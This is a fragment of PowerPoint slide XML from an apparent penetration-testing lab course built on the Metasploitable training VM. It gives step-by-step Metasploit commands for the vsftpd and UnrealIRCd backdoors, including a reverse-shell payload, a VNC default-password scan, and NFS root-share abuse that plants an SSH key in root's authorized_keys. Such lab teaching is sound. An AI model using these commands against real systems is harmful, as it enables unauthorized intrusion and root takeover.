            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1"/>
              <a:t>use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1"/>
              <a:t>/ftp/vsftpd_234_backdoor </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050"/>
              <a:t> exploit(vsftpd_234_backdoor) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1"/>
              <a:t>show info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Set the only required variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>We will use the only payload, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>/interact, check with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>show payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> exploit(vsftpd_234_backdoor) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>set RHOST 10.10.0.20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050"/>
              <a:t> exploit(vsftpd_234_backdoor) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="100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199" y="761547"/>
          <a:ext cx="8516984" cy="309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824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75680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50838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914917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403725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tcp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open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ftp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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>vsftpd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> 2.3.4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203" marR="4203" marT="4203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5DBC480B-468A-4439-96A2-C98FE950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6" y="3393628"/>
            <a:ext cx="4681958" cy="140540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497F2EE-3FC6-47B6-88C2-971EC63C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20" y="1879838"/>
            <a:ext cx="4472170" cy="6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21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Chat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Check out the port service list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Internet Relay Chat is an application protocol for text-based chat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>There is a server and a vulnerability here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploit it!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22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DE171-B08A-4B6C-B2B0-CC613856E2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84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6667/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> - IRC Vulnerability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173164"/>
            <a:ext cx="8572840" cy="3703635"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>A common IRC server was also backdoored!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://forums.unrealircd.org/viewtopic.php?t=6562</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Set our options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Set our payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>/reverse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>set LHOST 10.10.0.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>set RHOST 10.10.0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>exploit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199" y="761547"/>
          <a:ext cx="8887641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885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25997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84184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262548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103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6667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irc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Unreal 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ircd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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD8B377-1A1B-4C43-B6CF-76D41B1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1854861"/>
            <a:ext cx="4861560" cy="26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Metasploitable is an Ubuntu distribution released by Rapid7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Its purpose is to be vulnerable and let us practice!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Direct Download:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sourceforge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> mirrors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://sourceforge.net/projects/metasploitable/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You should have installed this in an earlier lab already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72C51-6CAE-48F7-97D6-3FA498BB1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6667/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> - IRC Vulnerability</a:t>
            </a:r>
          </a:p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5AA1B06-67A6-4B1A-8579-3120970E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9" y="1285954"/>
            <a:ext cx="5166455" cy="258210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F7FBAAB-5A0B-4AAA-8230-20D1789B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62" y="2632623"/>
            <a:ext cx="4859148" cy="21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VNC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112204"/>
            <a:ext cx="8572840" cy="3764595"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Besides exploitation tools, metasploit also has some recon and scanning tools to find vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Aux modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Check out the port service list, port 5900</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Search for auxiliary modules that work for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>vnc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRP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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>VNC Authentication Scanner is an Auxiliary Module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>It will check for poor or default configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Load it and check out info and options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>vnc_login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>msf5 auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>vnc_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:ea typeface="ＭＳ Ｐゴシック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667088"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="129980" y="732913"/>
          <a:ext cx="8887641" cy="31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839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98863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49977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4704682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vnc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VNC (protocol 3.3)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5D9FFCE1-8D82-4CF6-8D94-081DD88C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14" y="2227008"/>
            <a:ext cx="5380105" cy="14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3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VNC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Set our options for RHOSTS and try running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>vnc_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>set RHOSTS 10.10.0.10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>vnc_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We should see there is a default password being used, "password"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We can try to login with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>vncviewer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p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EC8C46E-96E2-43EE-924D-5B9AED5C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9" y="2310315"/>
            <a:ext cx="8220627" cy="23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2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NFS Vulnerability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1150304"/>
            <a:ext cx="8572840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sz="1800"/>
              <a:t>Network File Sharing may have vulnerabilities if there are default configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>There's a module for that too</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>We see there is RPC on port 111, common for supporting NFS shares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Do a search for NFS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nfs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Use the aux scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nfsmount</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Set your options and run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>See right: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>target is sharing the root directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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32374"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="119199" y="761547"/>
          <a:ext cx="8887641" cy="31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885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25997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84184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262548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rpcbind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 (RPC #100000)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2A99C9EA-5AE3-4965-B045-1C332248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96" y="2373554"/>
            <a:ext cx="4349184" cy="24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1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NFS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685484"/>
            <a:ext cx="8572840" cy="447325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 dirty="0"/>
              <a:t>We can utilize access with their NFS share to grant us SSH access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Generate a new SSH key on Kali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ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Copy the public key into the target's /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial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We now have full SSH access!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generate a new SSH key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>-keygen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Use default options </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mount the file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>  mount -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> 10.10.0.20:/ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Copy over the public key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200"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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cat /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/id_rsa.pub &gt;&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/target/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"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790414-8B4C-429D-B675-151445C9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68" y="1553702"/>
            <a:ext cx="2924441" cy="31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75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NFS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pPr marL="171450"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Unmount the NFS share</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>umount /tmp/target_root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Now we should be able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
